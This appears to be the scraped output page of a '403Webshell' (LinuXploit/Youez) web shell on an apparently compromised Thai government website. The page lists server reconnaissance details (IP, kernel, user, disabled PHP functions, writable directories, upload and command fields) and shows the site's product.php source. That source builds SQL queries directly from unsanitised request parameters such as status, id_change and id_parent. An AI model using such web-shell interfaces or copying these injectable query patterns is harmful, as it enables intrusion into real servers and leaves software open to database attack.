403Webshell
Server IP : 119.59.102.212  /  Your IP : 3.139.94.189
Web Server : Apache/2
System : Linux narin 2.6.32-042stab142.1 #1 SMP Tue Jan 28 23:44:17 MSK 2020 x86_64
User : yangkam ( 1022)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/product/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/yangkam/domains/yangkam.go.th/public_html/coremain/module/product/product.php
<?php
// g is product permission
import_request_variables('pG', 'p_');
if($p_id_product!="")						{	     $id_parent=trim($p_id_product);				}
if($p_status!="")							{	     $status=trim($p_status);				}
if($p_id_change!="")						{	     $id_change=trim($p_id_change);				}
if($p_startrow!="")							{	     $startrow=trim($p_startrow);				}

// paging
$NUM_PER_PAGE = 4;

//###################### paging ###################################	
	if (empty($startrow)) { //ลองตรวจดูว่าค่าแถวเริ่มต้นที่จะแสดงไม่ได้กำหนดหรือเปล่า ถ้าไม่ได้กำหนด จะกำหนดให้เป็น 0 
  $startrow = 0; 
} 	
	 $total_data = select_count("*","cms_product","id_parent=$id_parent");
	$total_page = intval((($total_data-1)/$NUM_PER_PAGE)+1); //หาค่าจำนวนหน้าทั้งหมดที่ต้องแสดง
	$current_page = (($startrow)/$NUM_PER_PAGE)+1; //หาว่าหน้าที่แสดงอยู่ปัจจุบันเป็นหน้าที่เท่าไหร่ 
	$numberpage=$startrow;
		
// ########################################################################


$parent_product_name = select_query_data("name","cms_product","id_product",$id_parent);
product_navig($id_parent);
bar_header("$parent_product_name"); // Bar_Header

// for admin and power user edit
 if (id_top_permission("g"))
 {
 	if($status!="")
		//echo "update cms_product SET condition=$_GET[status] WHERE id_product=$id_change";
		mysql_query ("update cms_product SET `condition`=$_GET[status] WHERE `id_product`=$id_change") or die (mysql_error());

 }

// $sql for main link menu

$result_main = select_result_query("*","cms_product","data_type","1","and id_parent=$id_parent");

$count_main = select_count("*","cms_product","data_type=1 and id_parent=$id_parent");
// $sql for sub detail link menu
$sql_sub = "SELECT * FROM cms_product WHERE data_type = 2";
$count_sub = select_count("*","cms_product","data_type=2 and id_parent=$id_parent");
$result_sub = select_result_query("*","cms_product","data_type","2","and id_parent=$id_parent LIMIT $startrow ,$NUM_PER_PAGE ");

// ****************************** main Link *******************************
if ($count_main!=0)
{
	$want_tr=0;
	$num_main = 0; // initial count
	echo "<table align='center' border='0'>";
	
	while ($data_main = mysql_fetch_array ($result_main))
	{
		if ($num_main%2==0)
		{
			echo "<tr>";
			$want_tr= 1;
		}	
			
		echo "<td width='50%'>";
		
		echo "<table widht='100%' border='0' align='center'>";
			echo "<tr>";
				echo "<td align='center'>";
					picture_frame($_SESSION[web_name]."/module_product/picture_main/$data_main[picture]","index.php?mod=product&path=product&id_product=$data_main[id_product]");
				echo "</td>";
			echo "</tr>";	
		echo "<tr>";
			echo "<td align='center'>$data_main[description]</td>";
		echo "<tr/>";
					// ส่วนแก้ไขข้อมูล
			 if (id_top_permission("g"))
			 {
			echo "<tr>";
				echo "<td align='center' width='40%'>";
		
			if($data_main[condition]==1)
					box_hide("index.php?mod=product&path=product&id_product=$id_parent&status=0&id_change=$data_main[id_product]");
				else
					box_show("index.php?mod=product&path=product&id_product=$id_parent&status=1&id_change=$data_main[id_product]");
				box_delete("index.php?mod=product_del&path=product&id_product=$data_main[id_product]","del_confirm");
				box_update("index.php?mod=product_edit&path=product&id_product=$data_main[id_product]");	
		
		echo "</td>";
		echo "</tr>";
		}
		echo"</table>";
		
	
		
		if ($num_main%2!=0)
		{
			echo "<tr>";
			$want_tr= 0;
		}	
		
			 $num_main++;
	} // end while
	if($want_tr==1)
	echo "</tr>";
	echo "</table>";
	
	
}
 if (id_top_permission("g")){
	echo"<br><table width='100%' border='0' cellpadding='0' cellspacing='0'>";
		echo"<tr>";
			echo"<td align=center>";
			echo"<a href=\"index.php?mod=product_add_main&path=product&id_parent=$id_parent\"><img src='coremain/images/true.gif' title='เพิ่ม Blog' border='0'>เพิ่มข้อมูลหัวหมวด</a>"; 
				
		echo "</td>";
		echo"</tr>";
		
		
	echo"</table><br>";
}

// ****************************** sub detail *******************************
if ($count_sub!=0)
{
echo "<hr/>";
	$want_tr=0;
	$num_sub = 0; // initial count
	echo "<table align='center' border='0' width='98%'>";
	
	while ($data_sub = mysql_fetch_array ($result_sub))
	{
		echo "<tr>";
		echo "<td align='center' width='40%'>";
			picture_frame($_SESSION[web_name]."/module_product/picture/$data_sub[picture]","index.php?mod=product_sub_detail&path=product&id_product=$data_sub[id_product]");	
		echo "</td>";	
		echo "<td align='left' width='60%'>";
			echo "<table>";
				echo "<tr>";
					echo "<td>";
						echo "ชื่อผลิตภัณฑ์ : ".$data_sub[name];
					echo "</td>";
				echo "</tr>";
				echo "<tr>";
					echo "<td>";
						echo "รายละเอียด : ".$data_sub[description];
					echo "</td>";
				echo "</tr>";
					echo "<tr>";
						echo "<td>";
							if($data_sub[attach_file]!="")
								echo "ไฟล์แนบ : <a href='".$_SESSION[web_name]."/module_product/attach/$data_sub[attach_file]'>$data_sub[old_attach_name]</a>";
						echo "</td>";	
				echo "</tr>";
				echo "</table>";
			echo "</td>";
			echo "</tr>";
			
			// ส่วนแก้ไขข้อมูล
			 if (id_top_permission("g"))
			 {
			echo "<tr>";
			echo "<td align='center' width='40%'>";
		
			if($data_sub[condition]==1)
					box_hide("index.php?mod=product&path=product&id_product=$id_parent&status=0&id_change=$data_sub[id_product]");
				else
					box_show("index.php?mod=product&path=product&id_product=$id_parent&status=1&id_change=$data_sub[id_product]");
				box_delete("index.php?mod=product_sub_del&path=product&id_product=$data_sub[id_product]","del_confirm");
				box_update("index.php?mod=product_sub_edit&path=product&id_product=$data_sub[id_product]");	
		
		echo "</td>";
		echo "</tr>";	
		}
	} // end while
	echo "</table>";
}

if ($_SESSION[admin_web]=="admin"){
	echo"<br><table width='100%' border='0' cellpadding='0' cellspacing='0'>";
		echo"<tr>";
			echo"<td align=center>";
			echo"	<a href=\"index.php?mod=product_add_sub&path=product&id_parent=$id_parent\"><img src='coremain/images/true.gif' title='เพิ่ม Blog' border=0>เพิ่มข้อมูลรายละเอียด</a>"; 
				
		echo "</td>";
		echo"</tr>";
	echo"</table><br>";
}
// paging

echo "<div align='left'>&nbsp;";
if ($total_page>1) { //ตรวจดูว่าถ้าจำนวนหน้าทั้งหมด มีเกิน 1 หน้า ต้องแสดงบรรทัดที่จะให้เลือกหน้า 
  $previous_page = $current_page-1; //หาว่าหน้าก่อนหน้าปัจจุบันคือหน้าอะไร 
  $next_page = $current_page+1; //หาว่าหน้าถัดจากหน้าปัจจุบันคืออะไร 
  if ($previous_page >0) { //ถ้าหน้าก่อนหน้าติดลบหรือเป็นศูนย์แสดงว่าไม่สามารถแสดงหน้าก่อนหน้าได้ 
    $new_startrow = $startrow - $NUM_PER_PAGE ; 
    $left_page_show = "<b><A HREF='index.php?mod=product&path=product&startrow=$new_startrow&id_product=$id_parent'>ก่อนหน้า</A></b> " ; 

  } else { 
    $left_page_show = "<font color='ff0000'><b>ก่อนหน้า </b></font>"; 
  } 
  if ($next_page > $total_page) { //ถ้าหน้าถัดไป มากกว่าจำนวนหน้าทั้งหมด แสดงว่าไม่สามารถแสดงหน้าถัดไปได้ 
    $right_page_show = "<font color='ff0000'><b> ต่อไป</b></font>"; 
  } else { 
    $new_startrow = $startrow + $NUM_PER_PAGE; 
	$right_page_show = " <b><A HREF='index.php?mod=product&path=product&startrow=$new_startrow&id_product=$id_parent'>ต่อไป</A></b>"; 
  }

  $middle_page_show = ""; 
  for ($i=1;$i<=$total_page;$i++) { //วนลูปแสดงหน้าทั้งหมด 
    if ($i == $current_page) { //ถ้าหน้าที่พิมพ์เป็นหน้าเดียวกับหน้าปัจจุบัน แสดงให้ไม่สามารถคลิ๊กได้ 
      $middle_page_show .= "<font color='ff0000'><b>[$i]</b></font>"; 
    } else { 
      $new_startrow = (($i-1)*$NUM_PER_PAGE); 
      $middle_page_show .= " <b><A HREF='index.php?mod=product&path=product&startrow=$new_startrow&id_product=$id_parent'>$i</A></b> "; 
    } 
  } 
  $page_show = $left_page_show . $middle_page_show . $right_page_show; 
} else { 
  $page_show = ""; 
} 
echo"&nbsp;$page_show";
echo"</div>";

?>
<script language="javascript">
	function del_confirm(){
		return confirm("ต้องการจะลบข้อมูลใช่หรือไม่");
	}
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit